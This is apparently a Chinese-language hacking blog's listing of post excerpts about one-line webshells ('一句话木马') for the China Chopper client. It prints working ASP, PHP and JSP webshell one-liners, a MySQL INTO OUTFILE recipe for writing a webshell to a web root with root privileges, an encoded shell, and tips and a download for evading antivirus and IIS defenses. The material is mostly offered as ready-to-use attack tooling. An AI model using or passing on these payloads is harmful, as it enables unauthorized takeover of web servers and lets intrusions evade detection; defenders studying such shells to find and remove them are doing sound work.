菜刀Jsp脚本增强版

分类:安全 | 2016-07-14 | 撸过 4,296 次
5人扯谈

某些朋友需求,这里简单的修改了下菜刀原作者的JSP脚本。主要是修复了一些BUG和代码优化,新增了查询自定义备份功能。
 
修复BUG:
 

1、初始化获取容器绝对路径错误如:原本路径是D:\wooyun菜刀连接默认跳转到了:D:\wooyun\wooyun目录。
2、修改了无法连接Oracle数据库问题
3、修改了远程下载代码
4、重新压了下代码

 

新的服务器端代码如下:

<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>[......]

继续阅读

Zend加密 免杀PHP一句话藐视所有IIS防御软件

分类:工具 | 2012-04-27 | 撸过 984 次
1人扯谈

话不多 直接截图。。。 抓紧下!

PHP一句话密码:caidao

 

下载地址:caidao

网盘下载:caidao.zip

文件大小:1 KB

避开eval关键字,打造免杀一句话木马

分类:安全 | 2012-02-22 | 撸过 2,442 次
0人扯谈

这年头留个php一句话木马,随便就被杀了,但具我所知,杀软和运维人员杀的都是eval函数的关键字,只要避开关键字就能延长木马的寿命,但要怎么避开呢?

首先我想到的是将eval从字符串类型赋给一个变量。

如:$func = 'phpinfo';

$func();

这样的确是可以运行phpinfo()的,但是eval却不能通过这样来执行,我马上又想到了assert函数,他有着类似eval的功能,但效果并不理想,完全没有eval用着爽,而且也是公开了的,所以我也就将他放弃了。

还记得《20 Ways to Fuzzing PHP Source Code》里提到的preg_replace代码[......]

继续阅读

小笔记,root权限导出一句话语句

分类:安全 | 2012-02-22 | 撸过 476 次
0人扯谈

随便一个库执行:

Create TABLE a (cmd text NOT NULL);
Insert INTO a (cmd) VALUES('<?php @eval($_POST[dead])?>');
select cmd from a into outfile 'D:\www.webshell.cc.php';
Drop TABLE IF EXISTS xiaoma;

创建表A,段CMD,内容

<?php @eval($_POST[dead])?>

导出D:\www.webshell.cc.php

一句话木马的适用环境和工作原理/原理应用解析

分类:技术 | 2011-12-21 | 撸过 450 次
0人扯谈

一句话木马的适用环境:

1.服务器的来宾账户有写入权限

2.已知数据库地址且数据库格式为asa或asp

3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可

 

一句话木马的工作原理:

"一句话木马"服务端(本地的html提交文件)

就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完 成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改

 

"一句话木马"客户[......]

继续阅读

webshell一句话木马大全

分类:安全 | 2011-12-16 | 撸过 11,016 次
0人扯谈

 

比较全的webshell一句话包括ASP,PHP,ASPX,JSP

asp一句话木马程序代码

<%eval request("sb")%>

程序代码

<%execute request("sb")%>

程序代码

<%execute(request("sb"))%>

程序代码

<%execute request("sb")%><%'<% loop <%:%>

程序代码

<%'<% loop <%:%><%execute request("sb")%>[......]

继续阅读

加密一句话木马

分类:安全 | 2011-11-8 | 撸过 1,483 次
1人扯谈
我原也以为这是ASCII码加密过的
73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛
全部数字减13,然后十进制解密 

<script>
var sun=[73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75];
var temp=new Array();
for(var i=0;i<sun.length;[......]

继续阅读

php最新变异一句话

分类:安全 | 2011-10-24 | 撸过 835 次
0人扯谈

注释:站长的任务又加重了,好好认识下,以后见了好清除

本来匿名发在土司上,现在应该传出去了,两个是来自国外的

http://h.ackack.net/tiny-php-shell.html

http://www.thespanner.co.uk/2011/09/22/non-alphanumeric-code-in-php/

具体看国外的文章吧

第一种:1.php

<?=($_=@$_GET[2]).@$_($_GET[1])?>

在菜刀里写http://www.92hack.net/1.php?2=assert密码是1

第二种2.php

<?

$_=[......]

继续阅读

php后台插一句话新思路

分类:安全 | 2011-09-22 | 撸过 969 次
0人扯谈

php后台插一句话的思路加114网址导航后台拿webshell的方法。

首先介绍下php的各种标签:

1):

<?php ?>

demo:

<?php echo "test";?>

这个标签现在程序大多都是使用的这种标签!大家都不陌生了,这里就不多介绍了!

2):

<? echo "test"; ?>

这种标签是在以前很普遍的一种用法php 老版本开发的cms大多都是用的它,

大多程序员都是很熟悉的!我们把这种标签称为短语标签!

3):

<script language="php"> </script>

demo:[......]

继续阅读